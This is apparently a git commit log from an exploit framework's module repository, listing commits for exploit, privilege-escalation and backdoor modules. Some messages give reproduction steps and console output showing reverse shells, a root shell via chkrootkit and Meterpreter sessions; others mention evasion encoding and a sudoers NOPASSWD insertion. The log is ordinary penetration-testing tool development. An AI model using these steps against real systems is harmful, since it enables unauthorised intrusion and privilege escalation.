Jon Hart
f8218f0536
Minor updates to print_ output; wire in handler_exists;
2015-11-18 11:05:10 -08:00
Jon Hart
392803daed
Tighten up cleanup code
2015-11-18 11:05:10 -08:00
William Vu
657e50bb86
Clean up module
2015-11-18 12:50:57 -06:00
m0t
c0d9c65ce7
always overwrite the payload file
2015-11-18 18:48:34 +00:00
wchen-r7
682a41af2e
Update description
2015-11-18 11:52:50 -06:00
wchen-r7
d6921fa133
Add Atlassian HipChat for Jira Plugin Velocity Template Injection
...
CVE-2015-5603
Also fixes a bug in response.rb (Fix #6254 )
2015-11-18 11:34:25 -06:00
sammbertram
a484b318eb
Update registry_persistence.rb
2015-11-18 16:13:18 +00:00
sammbertram
1fe8bc9cea
Added a SLEEP_TIME option
...
Added a SLEEP_TIME options which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot.
Alternatively, as opposed to a sleep time, it could have a loop that attempts to retry for a certain period of item.
2015-11-18 11:17:57 +00:00
Jon Hart
e21bf80ae4
Squash a rogue space
2015-11-17 14:17:59 -08:00
Jon Hart
3396fb144f
A little more simplification/cleanup
2015-11-17 14:16:29 -08:00
Jon Hart
dcfb3b5fbc
Let Filedropper handle removal
2015-11-17 13:01:06 -08:00
jvoisin
44d477a13c
Fix some rubocop warnings
2015-11-17 13:26:50 +01:00
Jon Hart
715f20c92c
Add missing super in setup
2015-11-16 14:45:13 -08:00
jvoisin
70407a4f21
3600 * 60 * 24 isn't one day
2015-11-16 23:18:02 +01:00
Jon Hart
902951c0ca
Clean up description; Simplify SOAP code more
2015-11-16 11:06:45 -08:00
Jon Hart
1aa1d7b5e4
Use random path for payload
2015-11-16 10:57:48 -08:00
Jon Hart
ee5d91faab
Better logging when exploit gets 401
2015-11-16 10:41:48 -08:00
Jon Hart
c4ffd7ae36
When sending SOAP requests, print out proto/status/message when fail
2015-11-16 10:38:40 -08:00
Jon Hart
e58e17450a
Simplify XML building
2015-11-13 11:36:56 -08:00
Jon Hart
ecbd453301
Second pass at style cleanup. Conforms now
2015-11-13 11:24:11 -08:00
Jon Hart
85e5b0abe9
Initial style cleanup
2015-11-13 10:42:26 -08:00
jvoisin
873994a154
Skip the explicit return
...
Thanks to kernelsmith for the feedback
2015-11-13 12:40:34 +01:00
Louis Sato
9a0f0a7843
Land #6142 , uptime refactor
2015-11-12 16:58:55 -06:00
wchen-r7
ee25cb88b5
Land #6196 , vBulletin 5.1.2 Unserialize Code Execution
2015-11-12 14:38:39 -06:00
wchen-r7
6077617bfd
rm res var name
...
the res variable isn't used
2015-11-12 14:37:47 -06:00
wchen-r7
199ed9ed25
Move vbulletin_unserialize.rb to exploits/multi/http/
...
According to @all3g, this works on Windows too, so we will move
this to multi/http.
2015-11-12 14:36:01 -06:00
jvoisin
3566b978c3
Add a module for a chkrootkit-powered privsec
...
This modules implements an exploit for CVE-2014-0476,
to gain root thanks to chkrootkit.
Its main issues is that you need to wait until chkrootkit
is executed in a crontab (or manually),
which can take 24h top with its default setup.
How to reproduce:
1. Install a version < 0.50 of chkrootkit
2. Launch the local module
3. Wait until chkrootkit's crontab kicks in
4. You've got a root shell
```
msf > use exploit/linux/local/chkrootkit
msf exploit(chkrootkit) > check
[*] 192.168.1.25 - The target appears to be vulnerable.
msf exploit(chkrootkit) > run
[*] Exploit completed, but no session was created.
[*] Started reverse handler on 192.168.1.11:9999
msf exploit(chkrootkit) > [+] Target is vulnerable.
[!] Rooting depends of the crontab, this could take a while.
[*] Payload written to /tmp/update
[*] Waiting to chkrookit to be run be a cron tab...
[*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100
[+] Deleted /tmp/update
msf exploit(chkrootkit) > sessions -i 6
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root) groups=0(root)
```
2015-11-12 19:30:05 +01:00
m0t
eae2d6c89d
F5 module
2015-11-12 09:51:09 +00:00
wchen-r7
8ea0a864db
Add a reference for patching
2015-11-10 23:32:22 -06:00
wchen-r7
66f3582991
Add Oracle Beehive prepareAudioToPlay Exploit Module
2015-11-10 23:05:11 -06:00
JT
a0351133a6
Add more references to this exploit
...
Adding exploit-db doc about China Chopper webshell and details about this webshell in US-CERT.
2015-11-11 09:51:05 +08:00
HD Moore
f86f427d54
Move Compat into Payload so that is actually used
2015-11-09 16:06:05 -06:00
m0t
66ed66cc81
Merge pull request #1 from m0t/changes
...
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-09 16:11:29 +00:00
m0t
daa999fb1c
f5 module
2015-11-09 16:02:32 +00:00
m0t
d4d4e3ddb0
f5 module
2015-11-09 13:41:59 +00:00
m0t
893c4cd52d
f5 module
2015-11-09 13:10:54 +00:00
jvoisin
e2678af0fe
The modules now works on 5.1.X and 5.0.X
...
- Added automatic targeting
- Added support for 5.0.X
2015-11-07 14:28:25 +01:00
wchen-r7
0cc8165b52
And I forgot to rm the test line
2015-11-06 18:11:27 -06:00
wchen-r7
8f2a716306
I don't really need to override fail_with
2015-11-06 18:11:08 -06:00
wchen-r7
0213da3810
Handle more NilClass bugs
2015-11-06 18:08:51 -06:00
Jon Hart
43229c16e7
Correct some authors with unbalanced angle brackets
2015-11-06 13:24:58 -08:00
William Vu
2df149b0a5
Land #6189 , extraneous Content-Length fix
2015-11-06 14:36:40 -06:00
William Vu
3cae7999aa
Prefer ctype over headers['Content-Type']
2015-11-06 14:36:21 -06:00
wchen-r7
f957acf9ba
Fix Framework Rspec Failure
...
Needs to do:
include Msf::Exploit::Remote::HTTP::Wordpress
2015-11-06 13:56:05 -06:00
wchen-r7
fb9a40f15c
Land #6103 , Add WordPress Plugin Ajax Load More Auth File Upload Vuln
2015-11-06 13:18:48 -06:00
wchen-r7
73f630b25a
Note default.php
2015-11-06 13:18:24 -06:00
jvoisin
f93f3397ec
Fix some mistakes pointed by @wchen-r7
2015-11-06 19:35:22 +01:00
jvoisin
c540ca763c
Add the EDB id
2015-11-06 17:21:28 +01:00
jvoisin
7998955b46
The double-quote character is a badchar
2015-11-06 16:43:53 +01:00
jvoisin
30e7a35452
Add the possibility to target non-default path
2015-11-06 15:33:30 +01:00
jvoisin
bb0e64e541
Implement a module for the recent vBulletin RCE
...
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X
Step to reproduce:
1. Install vBulletin 5.1.X
2. Launch the exploit against it
```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```
```
msf exploit(vbulletin) > run
[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100
meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
wchen-r7
46fac897bd
Land #6144 , China Chopper Web Shell (Backdoor) module
2015-11-05 18:29:36 -06:00
wchen-r7
ea22583ed1
Update title and description
2015-11-05 18:29:03 -06:00
wchen-r7
27be832c4c
remove the fail_with because it's always triggering anyway
2015-11-05 18:19:46 -06:00
dmohanty-r7
a71d7ae2ae
Land #6089 , @jvazquez-r7 Fix HTTP mixins namespaces
2015-11-05 16:56:41 -06:00
wchen-r7
038cb66937
Use the right module path
2015-11-05 16:16:46 -06:00
Brent Cook
ee6d6258a5
Land #6180 , add PSH as a target for psexec directly, implement autodetect
2015-11-05 10:38:50 -06:00
pyllyukko
4390fda513
Remove extra Content-Length HTTP header
...
The send_request_raw already sets the header and if it's set also in the
module, Metasploit sends the header twice.
2015-11-05 14:38:06 +02:00
William Vu
862dff964a
Integrate psexec_psh into psexec
2015-11-04 17:31:33 -06:00
nixawk
109e9b6b6e
remove debug info - require 'pry'
2015-11-03 06:52:11 +00:00
nixawk
46fe0c0899
base64 for evasion purposes
2015-11-03 06:42:52 +00:00
nixawk
6c16d2a1ca
caidao's exploit module
2015-11-02 08:54:18 +00:00
William Vu
6a01efa394
Deprecate psexec_psh
2015-10-30 17:41:58 -05:00
Louis Sato
2bd792f693
remove .rb file extension
2015-10-30 15:26:45 -05:00
wchen-r7
82e600a53a
Suggest the correct replacement for the deprecated module
...
The deprecated module has been suggesting the wrong replacement,
it should be exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
2015-10-29 16:24:29 -05:00
Louis Sato
57304a30a8
Land #6139 , remove bad ref links
2015-10-29 16:00:43 -05:00
wchen-r7
95920b7ff6
Bring back more working links
2015-10-29 15:57:16 -05:00
wchen-r7
da52c36687
Put back some links
2015-10-29 15:48:47 -05:00
nixawk
faf9be811a
delete caidao_php_backdoor_exec from exploits
2015-10-29 02:18:30 +00:00
nixawk
bc02993567
chinese caidao php backdoor command execution
2015-10-28 16:43:58 +00:00
wchen-r7
8757743821
Update description
2015-10-27 17:39:11 -05:00
wchen-r7
cfe9748962
Deprecate exploits/multi/http/uptime_file_upload
...
Please use uptime_file_upload_1.rb
2015-10-27 17:36:54 -05:00
wchen-r7
0c648eb210
Move to modules/exploits/multi/http/uptime_file_upload_2
...
This exploit is rather similiar to uptime_file_upload.rb, because
they both abuse post2file to upload. The difference is that this
module requires a priv escalation to be able to upload, and the
other one doesn't.
2015-10-27 17:31:31 -05:00
wchen-r7
592fdef93d
Update uptime_code_exec
2015-10-27 17:29:55 -05:00
wchen-r7
5b86d2ef95
Fix #6133 , update description, authors and references
...
Fix #6133
Thank you @japp-0xlabs
2015-10-27 14:38:18 -05:00
wchen-r7
154fb585f4
Remove bad references (dead links)
...
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
William Vu
74353686a3
Land #6136 , rescue SMB error for psexec
2015-10-27 09:31:37 -05:00
jvazquez-r7
b2e3ce1f8a
Allow to finish when deletion fails
2015-10-26 16:40:36 -05:00
wchen-r7
9adfd296a0
Land #6128 , Th3 MMA mma.php Backdoor Arbitrary File Upload
2015-10-26 15:26:06 -05:00
wchen-r7
0d9ebe13a1
Modify check
2015-10-26 15:25:38 -05:00
wchen-r7
f4abc16c66
Land #6102 , Add rsh/libmalloc privilege escalation exploit module
2015-10-26 10:54:05 -05:00
JT
4f244c54f8
Update mma_backdoor_upload.rb
2015-10-26 23:01:38 +08:00
Sam H
5fcc70bea4
Fixed issue w/ msf payloads + added timeout rescue
...
Apparently when OS X payload shells get a sudo command, it requires a full path (even though it clearly has $PATH defined in its env...) to that file. The updates here take that into account. Also, the script more directly catches a timeout error when the maximum time for sudoers file to change has passed.
2015-10-25 23:38:48 -07:00
JT
ad80f00159
Update mma_backdoor_upload.rb
2015-10-24 11:16:49 +08:00
JT
f461c4682b
Update mma_backdoor_upload.rb
2015-10-24 11:15:26 +08:00
wchen-r7
181e7c4c75
Update metadata
2015-10-23 17:22:31 -05:00
wchen-r7
01c2641c6b
Change print_*
2015-10-23 16:27:52 -05:00
wchen-r7
3c961f61a7
Modify check to use Nokogiri
2015-10-23 14:29:16 -05:00
wchen-r7
6f02cedff8
Move method create_exec_service
2015-10-23 13:10:00 -05:00
xistence
f632dd8f67
Add Joomla Content History SQLi RCE exploit module
2015-10-23 17:25:44 +07:00
Ewerson Guimaraes (Crash)
2828653f8f
Update uptime_code_exec.rb
2015-10-23 11:49:21 +02:00
Ewerson Guimaraes (Crash)
5539363218
Update uptime_code_exec.rb
2015-10-23 11:33:59 +02:00
JT
be89cb32c9
Th3 MMA mma.php Backdoor Arbitrary File Upload
2015-10-23 08:47:40 +08:00
wchen-r7
360f40249c
Land #6122 , user-assisted Safari applescript:// module (CVE-2015-7007)
2015-10-22 15:07:42 -05:00
wchen-r7
9d2e2df1f1
Update description
2015-10-22 15:07:11 -05:00
joev
35578c7292
Add refs.
2015-10-22 09:48:11 -05:00
joev
6a87e7cd77
Add osx safari cmd-R applescript exploit.
2015-10-22 09:46:56 -05:00
Sam H
348a0f9e3d
Cleaned up "cleanup" method and crontab check
...
The script now searches for the full line "ALL ALL=(ALL) NOPASSWD: ALL" written in the crontab file to ensure that it is successful rather than just "NOPASSWD". Additionally, the required argument used in the cleanup method was removed and simply turned into an instance method so it could be accessed without needing to call it with any arguments.
2015-10-21 22:53:32 -07:00
William Vu
997e8005ce
Fix nil http_method in php_include
2015-10-21 13:22:09 -05:00
William Vu
129544c18b
Land #6112 , splat for ZPanel exploit
2015-10-21 13:07:51 -05:00
Boumediene Kaddour
e188bce4c9
Update minishare_get_overflow.rb
2015-10-21 16:48:31 +02:00
wchen-r7
f06d7591d6
Add header for zpanel_information_disclosure_rce.rb
2015-10-20 16:19:44 -05:00
wchen-r7
70b005de7f
Land #6041 , Zpanel info disclosure exploit
2015-10-20 16:08:16 -05:00
wchen-r7
728fd17856
Make code changes for zpanel_information_disclosure_rce.rb
...
Use Nokogiri and URI, as well as indent fixes and other things
2015-10-20 16:07:02 -05:00
Sam H
712f9f2c83
Deleted extra reference to exploit DB
2015-10-18 19:10:47 -07:00
Sam Handelman
b03c3be46d
Fixed some styling errors in the initializer. Switched the calls to sleep(1) to use the Rex API (Rex.sleep(1) instead).
2015-10-18 02:13:03 -07:00
Roberto Soares
ba75e85eb3
Add WP Ajax Load More Plugin File Upload Vuln.
2015-10-17 13:30:36 -03:00
Sam Handelman
3757f2e8de
Changed my author name to make sure it matches my GitHub username inside the module information.
2015-10-16 14:54:34 -07:00
Sam Handelman
95d5e5831e
Adding the updated version of the module to submit a pull request. Changes were made to ensure that the OS version check correctly determines which systems are vulnerable, giving only a warning message if not.
2015-10-16 14:39:07 -07:00
jvazquez-r7
28ca34c40a
Fix conflicts
2015-10-16 15:38:59 -05:00
wchen-r7
c399d7e381
Land #5959 , Add Nibbleblog File Upload Vuln
2015-10-16 15:30:13 -05:00
wchen-r7
9666660c06
Enforce check and add another error message
2015-10-16 15:29:12 -05:00
William Vu
f14776ab63
Land #6092 , refs for arkeia_agent_exec
2015-10-15 22:50:57 -05:00
William Vu
8cb6cc57b5
Land #6094 , refs for another ManageEngine module
2015-10-15 22:49:05 -05:00
William Vu
86dfbf23e8
Fix whitespace
2015-10-15 22:48:53 -05:00
xistence
018b515150
Add CVE/URL references to manageengine_eventlog_analyzer_rce
2015-10-16 10:41:39 +07:00
xistence
b1f2e40b98
Add CVE/URL references to module manage_engine_opmanager_rce
2015-10-16 10:36:13 +07:00
xistence
6a1553ae63
Add EDB/CVE/URL references to arkeia_agent_exec
2015-10-16 10:23:20 +07:00
jvazquez-r7
67820f8b61
Fix Packetstorm references
2015-10-15 12:42:59 -05:00
jvazquez-r7
4517270627
Fix modules using Msf::HTTP::JBoss
2015-10-15 11:49:15 -05:00
jvazquez-r7
cf9ddbb701
Update moduels using Msf::HTTP::Wordpress
2015-10-15 11:47:13 -05:00
William Vu
bf9530d5ba
Land #5941 , X11 keyboard exec module
2015-10-14 11:38:47 -05:00
Brent Cook
30d2a3f2a9
Land #5999 , teach PSH web delivery to use a proxy
2015-10-14 11:05:45 -05:00
HD Moore
d67b55d195
Fix autofilter values for aggressive modules
2015-10-13 15:56:18 -07:00
William Vu
a4f0666fea
Land #6081 , DLink -> D-Link
2015-10-12 18:05:52 -05:00
Tod Beardsley
185e947ce5
Spell 'D-Link' correctly
2015-10-12 17:12:01 -05:00
Tod Beardsley
336c56bb8d
Note the CAPTCHA exploit is good on 1.12.
2015-10-12 17:09:45 -05:00
HD Moore
6f3bd81b64
Enable 64-bit payloads for MSSQL modules
2015-10-11 12:52:46 -05:00
jvazquez-r7
ed0b9b0721
Land #6072 , @hmoore-r7's lands Fix #6050 and moves RMI/JMX mixin namespace
2015-10-10 00:24:12 -05:00
jvazquez-r7
b9b488c109
Deleted unused exception handling
2015-10-09 23:38:52 -05:00
jvazquez-r7
c60fa496c7
Delete extra spaces
2015-10-09 23:37:11 -05:00
jvazquez-r7
e6fbca716c
Readd comment
2015-10-09 23:29:23 -05:00
jvazquez-r7
af445ee411
Re apply a couple of fixes
2015-10-09 23:24:51 -05:00
HD Moore
a590b80211
Update autoregister_ports, try both addresses for the MBean
2015-10-09 20:20:35 -07:00
HD Moore
2b94b70365
Always connect to RHOST regardless of JMXRMI address
2015-10-09 17:49:22 -07:00
HD Moore
cd2e9d4232
Move Msf::Java to the normal Msf::Exploit::Remote namespace
2015-10-09 13:24:34 -07:00
Tod Beardsley
94bb94d33a
Working URL for real
2015-10-09 15:07:44 -05:00
Tod Beardsley
b04f947272
Fix blog post date, derp
2015-10-09 14:59:57 -05:00
Tod Beardsley
55ef6ebe91
HP SiteScope vuln, R7-2015-17
...
On behalf of @l0gan, already reviewed once by @jvazquez-r7, reviewed
again by me.
For details, see:
https://community.rapid7.com/community/metasploit/blog/2017/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection
2015-10-09 14:55:48 -05:00
jvazquez-r7
5e9faad4dc
Revert "Merge branch using Rex sockets as IO"
...
This reverts commit c48246c91c
, reversing
changes made to 3cd9dc4fde
.
2015-10-09 14:09:12 -05:00
jvazquez-r7
347495e2f5
Rescue Rex::StreamClosedError when there is a session
2015-10-09 13:41:41 -05:00
brent morris
28454f3b2e
MSFTidyness
2015-10-08 12:59:46 -04:00
wchen-r7
871f46a14e
Land #6038 , ManageEngine ServiceDesk Plus Arbitrary File Upload
2015-10-07 15:17:58 -05:00
wchen-r7
dddfaafac7
Update reference
2015-10-07 15:17:22 -05:00
Christian Mehlmauer
eb597bb9f3
Land #5842 , watermark fileformat exploit
2015-10-07 19:29:04 +02:00
jakxx
c5237617f2
Update buffer size for reliability
2015-10-06 18:12:40 -04:00
brent morris
5eff3e5637
Removed hard tabs
2015-10-02 14:34:00 -04:00
brent morris
4ee7ba05aa
Removing hard tabs test
2015-10-02 14:31:46 -04:00
brent morris
6406a66bc0
Remove Ranking
2015-10-02 14:24:46 -04:00
brent morris
9f71fd9bfd
Formatting ZPanel Exploit
2015-10-02 14:23:07 -04:00
brent morris
89a50c20d0
Added Zpanel Exploit
2015-10-02 13:29:53 -04:00
William Vu
a773627d26
Land #5946 , simple_backdoors_exec module
2015-10-02 11:18:29 -05:00
William Vu
5b8f98ee06
Land #6022 , zemra_panel_rce module
2015-10-02 11:18:09 -05:00
Pedro Ribeiro
659a09f7d2
Create manageengine_sd_uploader.rb
2015-10-02 16:04:05 +01:00
jvazquez-r7
75d2a24a0a
Land #6019 , @pedrib's Kaseya VSA ZDI-15-449 exploit
2015-10-02 08:51:28 -05:00
Pedro Ribeiro
cbbeef0f53
Update kaseya_uploader.rb
2015-10-02 13:20:59 +01:00
JT
33916997a4
Update zemra_panel_rce.rb
...
revised the name and the description
2015-10-02 09:49:59 +08:00
JT
fa1391de87
Update simple_backdoors_exec.rb
...
Updating the code as suggested
2015-10-02 07:53:15 +08:00
JT
501325d9f4
Update zemra_panel_rce.rb
2015-10-02 06:48:34 +08:00
jvazquez-r7
a88a6c5580
Add WebPges to the paths
2015-10-01 13:22:56 -05:00
jvazquez-r7
f9a9a45cf8
Do code cleanup
2015-10-01 13:20:40 -05:00
Hans-Martin Münch (h0ng10)
30101153fa
Remove spaces
2015-10-01 18:56:37 +02:00
Hans-Martin Münch (h0ng10)
41cf0ef676
Add reference for CVE-2015-2342 - VMWare VCenter JMX RMI RCE
2015-10-01 18:43:21 +02:00
JT
2802b3ca43
Update zemra_panel_rce.rb
...
sticking res
2015-10-02 00:00:30 +08:00
William Vu
2ab779ad3d
Land #6010 , capture_sendto fixes
2015-10-01 10:54:24 -05:00
JT
5c5f3a4e7f
Update zemra_panel_rce.rb
...
called http_send_command right away :)
2015-10-01 23:39:36 +08:00
William Vu
0bacb3db67
Land #6029 , Win10 support for bypassuac_injection
2015-10-01 10:17:34 -05:00
JT
66560d5339
Update zemra_panel_rce.rb
2015-10-01 19:16:23 +08:00
William Vu
2e2d27d53a
Land #5935 , final creds refactor
2015-10-01 00:25:14 -05:00
OJ
7451cf390c
Add Windows 10 "support" to bypassuac_injection
2015-10-01 11:16:18 +10:00
JT
a7fa939fda
Zemra Botnet C2 Web Panel Remote Code Execution
...
This module exploits the C2 web panel of Zemra Botnet which contains a backdoor inside its leaked source code. Zemra is a crimeware bot that can be used to conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
2015-09-30 19:24:21 +08:00
JT
2de6c77fa2
Update simple_backdoors_exec.rb
2015-09-30 18:11:05 +08:00
jakxx
47c79071eb
fix indention and typo
2015-09-29 22:41:36 -04:00
jakxx
f18e1d69a1
Add x64 ret address and add to buffer
2015-09-29 22:36:30 -04:00
Pedro Ribeiro
61c922c24d
Create kaseya_uploader.rb
2015-09-29 11:56:34 +01:00
JT
46adceec8f
Update simple_backdoors_exec.rb
2015-09-29 10:40:28 +08:00
JT
dd650409e4
Update simple_backdoors_exec.rb
2015-09-29 08:05:13 +08:00
bigendian smalls
a47557b9c1
Upd. multi/handler to include mainframe platform
...
Quick update to multi handler so it recognizes mainframe platform based
modules
2015-09-28 11:14:08 -05:00
Jon Hart
96e4e883ae
Fix #6008 for wireshark_lwres_getaddrbyname_loop
2015-09-27 14:56:11 -07:00
Jon Hart
bd2f73f40a
Fix #6008 for wireshark_lwres_getaddrbyname
2015-09-27 14:55:19 -07:00
Jon Hart
bbd08b84e5
Fix #6008 for snort_dce_rpc
2015-09-27 14:53:40 -07:00
jvazquez-r7
b206de7708
Land #5981 , @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit
2015-09-27 00:42:17 -05:00
jvazquez-r7
55f573b4c9
Do code cleanup
2015-09-27 00:33:40 -05:00
jvazquez-r7
c8880e8ad6
Move local exploit to correct location
2015-09-25 11:37:38 -05:00
jvazquez-r7
6b46316a56
Do watchguard_local_privesc code cleaning
2015-09-25 11:35:21 -05:00
jvazquez-r7
c79671821d
Update with master changes
2015-09-25 10:47:37 -05:00
jvazquez-r7
e87d99a65f
Fixing blocking option
2015-09-25 10:45:19 -05:00
jvazquez-r7
890ac92957
Warn about incorrect payload
2015-09-25 10:10:08 -05:00
jvazquez-r7
19b577b30a
Do some code style fixes to watchguard_cmd_exec
2015-09-25 09:51:00 -05:00
jvazquez-r7
b35da0d91d
Avoid USERNAME and PASSWORD datastore options collisions
2015-09-25 09:36:47 -05:00
jvazquez-r7
52c4be7e8e
Fix description
2015-09-25 09:35:30 -05:00
JT
e185277ac5
Update simple_backdoors_exec.rb
2015-09-24 14:14:23 +08:00
JT
56a551313c
Update simple_backdoors_exec.rb
2015-09-24 13:54:40 +08:00
JT
192369607d
Update simple_backdoors_exec.rb
...
updated the string 'echo me' to a random text
2015-09-24 13:49:33 +08:00
Meatballs
66c9222968
Make web_delivery proxy aware
2015-09-23 20:45:51 +01:00
Daniel Jensen
3dd917fd56
Altered the module to use the primer callback, and refactored some code to remove useless functions etc
2015-09-24 00:20:13 +12:00
William Vu
d798ef0885
Land #5893 , w3tw0rk/Pitbul RCE module
2015-09-23 02:41:01 -05:00
William Vu
8106bcc320
Clean up module
2015-09-21 14:37:54 -05:00
wchen-r7
fd190eb56b
Land #5882 , Add Konica Minolta FTP Utility 1.00 CWD command module
2015-09-18 11:10:20 -05:00
wchen-r7
0aea4a8b00
An SEH? A SEH?
2015-09-18 11:09:52 -05:00
jvazquez-r7
ab8d12e1ac
Land #5943 , @samvartaka's awesome improvement of poisonivy_bof
2015-09-16 16:35:04 -05:00
jvazquez-r7
af1cdd6dea
Return Appears
2015-09-16 16:34:43 -05:00
jvazquez-r7
402044a770
Delete comma
2015-09-16 16:23:43 -05:00
jvazquez-r7
75c6ace1d0
Use single quotes
2015-09-16 16:23:10 -05:00
jvazquez-r7
88fdc9f123
Clean exploit method
2015-09-16 16:14:21 -05:00
jvazquez-r7
d6a637bd15
Do code cleaning on the check method
2015-09-16 16:12:28 -05:00
wchen-r7
c7afe4f663
Land #5930 , MS15-078 (atmfd.dll buffer overflow)
2015-09-16 15:33:38 -05:00
jvazquez-r7
37d42428bc
Land #5980 , @xistence exploit for ManageEngine OpManager
2015-09-16 13:19:49 -05:00
jvazquez-r7
8f755db850
Update version
2015-09-16 13:19:16 -05:00
jvazquez-r7
1b50dfc367
Change module location
2015-09-16 11:43:09 -05:00
jvazquez-r7
122103b197
Do minor metadata cleanup
2015-09-16 11:41:23 -05:00
jvazquez-r7
aead0618c7
Avoid the WAIT option
2015-09-16 11:37:49 -05:00
jvazquez-r7
0010b418d0
Do minor code cleanup
2015-09-16 11:31:15 -05:00
jvazquez-r7
f3b6606709
Fix check method
2015-09-16 11:26:15 -05:00
Daniel Jensen
7985d0d7cb
Removed privesc functionality, this has been moved to another module. Renamed module
2015-09-16 23:29:26 +12:00
Daniel Jensen
bdd90655e4
Split off privesc into a seperate module
2015-09-16 23:11:32 +12:00
jvazquez-r7
24af3fa12e
Add rop chains
2015-09-15 14:46:45 -05:00
William Vu
abe65cd400
Land #5974 , java_jmx_server start order fix
2015-09-15 01:33:44 -05:00
xistence
c99444a52e
ManageEngine EventLog Analyzer Remote Code Execution
2015-09-15 07:29:16 +07:00
xistence
7bf2f158c4
ManageEngine OpManager Remote Code Execution
2015-09-15 07:24:32 +07:00
JT
9e6d3940b3
Update simple_backdoors_exec.rb
2015-09-13 23:30:14 +08:00
wchen-r7
ae5aa8f542
No FILE_CONTENTS option
2015-09-12 23:32:02 -05:00
Daniel Jensen
4e22fce7ef
Switched to using Rex MD5 function
2015-09-13 16:23:23 +12:00
jvazquez-r7
0d52a0617c
Verify win32k 6.3.9600.17837 is working
2015-09-12 15:27:50 -05:00
jvazquez-r7
9626596f85
Clean template code
2015-09-12 13:43:05 -05:00
Hans-Martin Münch (h0ng10)
0c4604734e
Webserver starts at the beginning, stops at the end
2015-09-12 19:42:31 +02:00
xistence
dc8d1f6e6a
Small changes
2015-09-12 13:08:58 +07:00
wchen-r7
01053095f9
Add MS15-100 Microsoft Windows Media Center MCL Vulnerability
2015-09-11 15:05:06 -05:00
jvazquez-r7
53f995b9c3
Do first prototype
2015-09-10 19:35:26 -05:00
wchen-r7
017832be88
Land #5953 , Add Bolt CMS File Upload Vulnerability
2015-09-10 18:29:13 -05:00
wchen-r7
602a12a1af
typo
2015-09-10 18:28:42 -05:00
Roberto Soares
68521da2ce
Fix check method.
2015-09-10 04:40:12 -03:00
Roberto Soares
4566f47ac5
Fix check method.
2015-09-10 03:56:46 -03:00
Roberto Soares
0ba03f7a06
Fix words.
2015-09-09 21:27:57 -03:00
Roberto Soares
bc3f5b43ab
Removerd WordPress mixin.
2015-09-09 21:26:15 -03:00
Roberto Soares
4e31dd4e9f
Add curesec team as vuln discovery.
2015-09-09 21:13:51 -03:00
Roberto Soares
6336301df3
Add Nibbleblog File Upload Vulnerability
2015-09-09 21:05:36 -03:00
Roberto Soares
d3aa61d6a0
Move bolt_file_upload.rb to exploits/multi/http
2015-09-09 13:41:44 -03:00
Roberto Soares
2800ecae07
Fix alignment.
2015-09-09 01:21:08 -03:00
Roberto Soares
48bd2c72a0
Add fail_with method and other improvements
2015-09-09 01:11:35 -03:00
Roberto Soares
f08cf97224
Check method implemented
2015-09-08 23:54:20 -03:00
Roberto Soares
6de0c9584d
Fix some improvements
2015-09-08 23:15:42 -03:00
JT
31a8907385
Update simple_backdoors_exec.rb
2015-09-09 08:30:21 +08:00
jvazquez-r7
329e6f4633
Fix title
2015-09-08 15:31:14 -05:00
JT
4e23bba14c
Update simple_backdoors_exec.rb
...
removing the parenthesis for the if statements
2015-09-08 15:47:38 +08:00
JT
002aada59d
Update simple_backdoors_exec.rb
...
changed shell to res
2015-09-08 14:54:26 +08:00
JT
467f9a8353
Update simple_backdoors_exec.rb
2015-09-08 14:45:54 +08:00
JT
37c28ddefb
Update simple_backdoors_exec.rb
...
Updated the description
2015-09-08 13:42:12 +08:00
JT
0f8123ee23
Simple Backdoor Shell Remote Code Execution
2015-09-08 13:08:47 +08:00
samvartaka
0a0e7ab4ba
This is a modification to the original poisonivy_bof.rb exploit
...
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.
See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.
## Console output
Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.
### Version 2.3.2 (unknown password)
```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check
[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit
[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```
### Version 2.2.0 (unknown password)
```
msf exploit(poisonivy_bof) > check
[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > show targets
Exploit targets:
Id Name
-- ----
0 Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
1 Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
2 Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1
msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0
msf exploit(poisonivy_bof) > exploit
[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...
Microsoft Windows XP [Version 5.1.2600]
